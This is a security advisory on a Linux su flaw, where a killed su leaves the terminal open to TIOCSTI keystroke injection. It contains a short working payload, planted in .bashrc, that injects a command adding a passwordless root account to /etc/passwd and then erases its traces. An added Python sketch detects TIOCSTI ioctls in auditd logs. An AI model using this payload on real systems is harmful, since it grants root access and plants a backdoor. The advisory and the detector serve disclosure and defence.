COMMAND

    su

SYSTEMS AFFECTED

    Linux

PROBLEM

    Michal Zalewski posted the following.  There's a problem with the
    Linux su command.  If a non-root account is compromised, e.g. with
    a lynx/ncftp bug, and .bashrc on this non-root account is altered
    to something like this:

    cat >/tmp/a.c <<X
    #include <sys/ioctl.h>
    main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0,
    P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);}
    X
    gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear

    During the next su session, "echo '...' >>/etc/passwd" will be
    executed under the root account.  In general, the problem lies in
    the ability of an unprivileged process to kill su itself - it will
    still be able to control terminal i/o, because su, when killed with
    SIGKILL, performs no tty hangup/reset.  So we may pass anything to
    the privileged shell, or do anything else with the terminal.  So
    there are 3 bugs: an unprivileged process may kill 'su'; 'su'
    doesn't perform any tty checks; bash is also careless.

SOLUTION

    Replace Linux su with another one.  This should be fixed soon.
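
    Added example, not part of the original advisory: a detection
    sketch that scans Linux audit SYSCALL records for the
    ioctl(TIOCSTI) call the injection above relies on.  It assumes
    auditd logs ioctl calls (for instance with a rule such as
    "-a always,exit -F arch=b64 -S ioctl -F a1=0x5412 -k tiocsti");
    the sample records are constructed.

```python
import re

TIOCSTI = 0x5412  # asm-generic value (x86, arm64); a few architectures differ
# ioctl syscall number keyed by the audit "arch" field
IOCTL_NR = {"c000003e": 16, "40000003": 54, "c00000b7": 29}
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def find_tiocsti(lines):
    """Return one dict per audit SYSCALL record that is ioctl(fd, TIOCSTI, ...)."""
    hits = []
    for line in lines:
        rec = {k: v.strip('"') for k, v in FIELD.findall(line)}
        if rec.get("type") != "SYSCALL":
            continue
        nr = IOCTL_NR.get(rec.get("arch"))
        if nr is None or rec.get("syscall") != str(nr):
            continue  # not ioctl on a known architecture
        try:
            # audit prints a0..a3 as bare hex; the kernel reads the ioctl
            # command as a 32-bit value, so compare the low 32 bits only
            cmd = int(rec["a1"], 16) & 0xFFFFFFFF
        except (KeyError, ValueError):
            continue
        if cmd == TIOCSTI:
            hits.append({f: rec.get(f) for f in ("pid", "ppid", "uid", "tty", "exe")})
    return hits

# Constructed sample records (not taken from a real system)
SAMPLE = [
    'type=SYSCALL msg=audit(1700000000.101:41): arch=c000003e syscall=16 '
    'success=yes exit=0 a0=0 a1=5412 a2=7ffc0a10 a3=0 ppid=1200 pid=1234 '
    'uid=1000 tty=pts0 comm="a" exe="/tmp/a" key="tiocsti"',
    'type=SYSCALL msg=audit(1700000000.102:42): arch=c000003e syscall=16 '
    'success=yes exit=0 a0=0 a1=5401 a2=7ffc0b20 a3=0 ppid=1100 pid=1200 '
    'uid=1000 tty=pts0 comm="bash" exe="/usr/bin/bash"',      # TCGETS, benign
    'type=SYSCALL msg=audit(1700000000.103:43): arch=c000003e syscall=59 '
    'success=yes exit=0 a0=1 a1=5412 a2=0 a3=0 ppid=1200 pid=1300 '
    'uid=1000 tty=pts0 comm="ls" exe="/usr/bin/ls"',          # execve, not ioctl
    'type=SYSCALL msg=audit(1700000000.104:44): arch=40000003 syscall=54 '
    'success=yes exit=0 a0=0 a1=5412 a2=bf80aa00 a3=0 ppid=1400 pid=1401 '
    'uid=1001 tty=pts1 comm="x32" exe="/home/u/x32"',         # 32-bit caller
    'type=PATH msg=audit(1700000000.104:44): item=0 name="/dev/pts/1"',
]

if __name__ == "__main__":
    for hit in find_tiocsti(SAMPLE):
        print("TIOCSTI use:", hit)
```

    A hit whose tty is later used by a su or root shell session is the
    pattern described in PROBLEM above.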